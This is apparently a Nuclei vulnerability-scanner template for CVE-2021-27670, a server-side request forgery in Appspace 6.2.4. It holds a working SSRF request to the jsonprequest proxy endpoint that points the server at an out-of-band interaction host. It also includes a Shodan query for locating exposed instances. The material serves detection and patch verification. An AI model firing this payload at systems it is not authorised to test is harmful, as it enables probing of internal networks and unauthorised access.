46 lines
1.4 KiB
YAML
46 lines
1.4 KiB
YAML
id: CVE-2021-27670
|
|
|
|
info:
|
|
name: Appspace 6.2.4 - Server-Side Request Forgery
|
|
author: ritikchaddha
|
|
severity: critical
|
|
description: Appspace 6.2.4 allows SSRF via the api/v1/core/proxy/jsonprequest url parameter.
|
|
remediation: |
|
|
Upgrade to a patched version of Appspace 6.2.4 or apply the necessary security patches provided by the vendor.
|
|
reference:
|
|
- https://github.com/h3110mb/PoCSSrfApp
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-27670
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2021-27670
|
|
cwe-id: CWE-918
|
|
epss-score: 0.34454
|
|
epss-percentile: 0.96683
|
|
cpe: cpe:2.3:a:appspace:appspace:6.2.4:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: appspace
|
|
product: appspace
|
|
shodan-query: title:"Appspace"
|
|
tags: cve,cve2023,appspace,ssrf
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://oast.live'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "<h1> Interactsh Server </h1>"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4a0a0047304502207dfac93550d78f9de60aa4babad1a3d9555d9c92a34019ead3c3f7896ce9a57c02210082c6ccf19e3d1aeed31718460c2375ea1544e40d78c61a5c78a1d80e90ada27d:922c64590222798bb761d5b6d8e72950
|